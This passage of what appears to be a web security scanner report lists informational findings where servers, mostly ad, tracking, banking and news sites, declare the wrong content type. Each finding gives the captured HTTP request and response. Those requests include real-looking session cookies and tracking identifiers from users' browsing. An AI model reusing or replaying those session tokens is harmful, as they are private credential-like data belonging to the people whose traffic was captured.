Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ASP.NET_SessionId=t40lmqeexjtjkkvhq4caiv55; COUNTRYCODE=USA; TestCookie=OK; ssotgt=f2eos; C1_REDIRECT=; SSP_Params=; VS_COOKIE=Login

Response

HTTP/1.1 200 OK
Cache-Control: max-age=28800
Content-Length: 554
Content-Type: image/gif
Last-Modified: Fri, 08 Feb 2008 02:26:56 GMT
Accept-Ranges: bytes
ETag: "018e812fa69c81:996e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:36:20 GMT

.PNG
.
...IHDR.......s.....n!.q....tEXtSoftware.Adobe ImageReadyq.e<...)PLTE......Z..6f....X..Dp....Fr....e........,_...........................................U~.......S|.h..]..~..'Z.......?m.`....
...[SNIP]...

29.80. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

29.81. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://spd.pointroll.com
Path:	/PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /PointRoll/Ads/PRScript.dll?v=129&pos=0&init=0&delay=0&push=0&set=2&bye=1&intact=3 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=Eo1TOtJ24; PRgo=BBBAAuILBBVCFUE6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 11836
Date: Sat, 23 Jul 2011 13:19:45 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...

29.82. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=54909046 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=54909046
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1483"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Fri, 22 Jul 2011 20:32:09 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

29.83. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://switch.atdmt.com
Path:	/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.84. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://switch.atdmt.com
Path:	/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.85. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://switch.atdmt.com
Path:	/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.86. http://syn.5min.com/handlers/SenseHandler.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://syn.5min.com
Path:	/handlers/SenseHandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /handlers/SenseHandler.ashx?func=GetResults&thumbSeedCounter=0&sid=768&categories=6%2C5%2C8%2C4%2C13%2C2%2C14&fallback=0&fallbackType=featured&textLocation=1&thumbnailSize=0&width=468&height=200&NumOfColumnsAsked=3&NumOfRowsAsked=1&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&isnewts=true&callback=FIVEMIN.RequestManager.callbacks[71787] HTTP/1.1
Host: syn.5min.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

29.87. http://trk.etrigue.com/track.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trk.etrigue.com
Path:	/track.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 19:55:55 GMT
Content-Length: 26

etrigue1311365721230=null;

29.88. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

29.89. http://web2.checkm8.com/adam/detect previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://web2.checkm8.com
Path:	/adam/detect

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play= HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.24 ny-ad14
Set-cookie: cm8dccp=1311365646;Path=/;Expires=Sat, 23-Jul-2011 20:14:06 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 697
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://web2.checkm8.com/adam/detected?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=ht
...[SNIP]...

29.90. http://widgets.klout.com/public/scripts/widget_hover.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://widgets.klout.com
Path:	/public/scripts/widget_hover.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /public/scripts/widget_hover.js HTTP/1.1
Host: widgets.klout.com
Proxy-Connection: keep-alive
Referer: http://widgets.klout.com/?from=ks
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.5.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:03 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 4692
Connection: close
Content-Type: text/html; charset=UTF-8

(function(){
this.static = ["business","sample-content","sample-score","sample-summary","press","about","careers","jobs","terms","privacy","maintenance","kscore","contact","influencetracker","invite
...[SNIP]...

29.91. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-off.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/Themes/Common/CS/images/Common/star-left-off.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /Themes/Common/CS/images/Common/star-left-off.gif HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: BIGipServer=1932476484.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: image/gif
Last-Modified: Sat, 11 Sep 2010 03:12:04 GMT
Accept-Ranges: bytes
ETag: "09ac71b5f51cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:34 GMT
Content-Length: 452

.PNG
.
...IHDR.............5C..... pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...:IDATx.b...?.6..@XQvv..@.1.........].. . FF.X333.....`ff.PPP`.. ..y.0.?.p...J....
...[SNIP]...

29.92. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-on.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/Themes/Common/CS/images/Common/star-left-on.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /Themes/Common/CS/images/Common/star-left-on.gif HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: BIGipServer=1932476484.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: image/gif
Last-Modified: Sat, 11 Sep 2010 03:12:04 GMT
Accept-Ranges: bytes
ETag: "09ac71b5f51cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:33 GMT
Content-Length: 443

.PNG
.
...IHDR.............5C......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx.b...?.6..@X..........xf..>...%....`bb....d.. . vv...^3...b..g......._TK.....@.1>....,!.@..nv...b..n.6..
...[SNIP]...

29.93. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-off.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/Themes/Common/CS/images/Common/star-right-off.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /Themes/Common/CS/images/Common/star-right-off.gif HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: BIGipServer=1932476484.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: image/gif
Last-Modified: Sat, 11 Sep 2010 03:12:04 GMT
Accept-Ranges: bytes
ETag: "09ac71b5f51cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:34 GMT
Content-Length: 490

.PNG
.
...IHDR...............e.... pHYs.................gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F...`IDATx.b...?....@..........ILL.RZZ.>6I..b233c`dd..& .@L

......$................,,
...[SNIP]...

29.94. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-on.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/Themes/Common/CS/images/Common/star-right-on.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /Themes/Common/CS/images/Common/star-right-on.gif HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: BIGipServer=1932476484.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: image/gif
Last-Modified: Sat, 11 Sep 2010 03:12:04 GMT
Accept-Ranges: bytes
ETag: "09ac71b5f51cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:34 GMT
Content-Length: 472

.PNG
.
...IHDR...............e.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...jIDATx.b...?....@...2..... &.~.Kg.0.c... &!.H.&&.Xl......k......M. .X...1..jI..v........k..b.......7.... .....
...[SNIP]...

29.95. http://wow.curse.com/adserver/default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/adserver/default.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adserver/default.aspx?ContentName=AdHeader&PortalId=5&PageName=projects.projects_ViewProjectPost&keywords=game%3dwow%2bgroup%3dprojects%2bpage%3dprojects_viewprojectpost%2bsite%3dwow%2blang%3den%2bproject_name%3drawr-official%2bproject_cat%3ddata-export%2bproject_cat%3dcaster%2bproject_cat%3ddamage-dealer%2bproject_cat%3dhealer%2bproject_cat%3dtank HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: BIGipServer=1932476484.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:21 GMT
Content-Length: 692

try {

<!--
if (window.adgroupid == undefined) {
window.adgroupid = Math.round(Math.random() * 1000);
}
document.write('<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addy
...[SNIP]...

29.96. http://www.articleonepartners.com/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.articleonepartners.com
Path:	/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.articleonepartners.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=evd5u35eelemsittt9277ghcq5; AOPuser=Yes; webpool=webpool_WWW1; __utma=186260214.1686194894.1311368070.1311368070.1311368070.1; __utmb=186260214.1.10.1311368070; __utmc=186260214; __utmz=186260214.1311368070.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-07-22%2016%3A54%3A20; hubspotutk=ccc8f979716a46c2b5c5dd104d2fb89b; hubspotvd=ccc8f979716a46c2b5c5dd104d2fb89b; hubspotvw=ccc8f979716a46c2b5c5dd104d2fb89b; hubspotvm=ccc8f979716a46c2b5c5dd104d2fb89b; hsfirstvisit=http%3A%2F%2Fwww.articleonepartners.com%2F||2011-07-22%2016%3A54%3A20

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:54:35 GMT
Server: Apache
Last-Modified: Tue, 12 Jul 2011 21:55:33 GMT
ETag: "1ec87e-47e-4a7e65be69f40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................................rg`.Y0..T(..X+.........G80....`...........................P....7...wE...M...P..=....... ...@ ..xX@....................?..
...[SNIP]...

29.97. http://www.articleonepartners.com/images/ipwatchdog.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.articleonepartners.com
Path:	/images/ipwatchdog.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /images/ipwatchdog.png HTTP/1.1
Host: www.articleonepartners.com
Proxy-Connection: keep-alive
Referer: http://www.articleonepartners.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=evd5u35eelemsittt9277ghcq5; AOPuser=Yes; webpool=webpool_WWW1

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:54:32 GMT
Server: Apache
Last-Modified: Tue, 12 Jul 2011 21:55:33 GMT
ETag: "1ec67d-2f05-4a7e65be69f40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 12037
Connection: close
Content-Type: image/png

......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........$..acspAPPL...................................-appl................................................desc...P...bdscm.......Bcprt..
...[SNIP]...

29.98. http://www.asp.net/omniture/analyticsid.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.asp.net
Path:	/omniture/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /omniture/analyticsid.aspx HTTP/1.1
Host: www.asp.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.asp.net/ajax

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:42 GMT

29.99. http://www.betabeat.com/wp-admin/admin-ajax.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.betabeat.com
Path:	/wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
Content-Length: 43
Pragma: no-cache
Cache-Control: no-cache

action=wpp_update&token=423dd424e6&id=12522

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:13:52 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.6-1+lenny2
X-Content-Type-Options: nosniff
Content-Length: 2
Content-Type: text/html; charset=UTF-8
Set-Cookie: visitor_page_count=2; expires=Thu, 21-Jul-2011 16:13:52 GMT; path=/

OK

29.100. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.boston.com
Path:	/newsprojects/widgets/twitter/get_tweet_count.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

29.101. https://www.capitalone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.capitalone.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
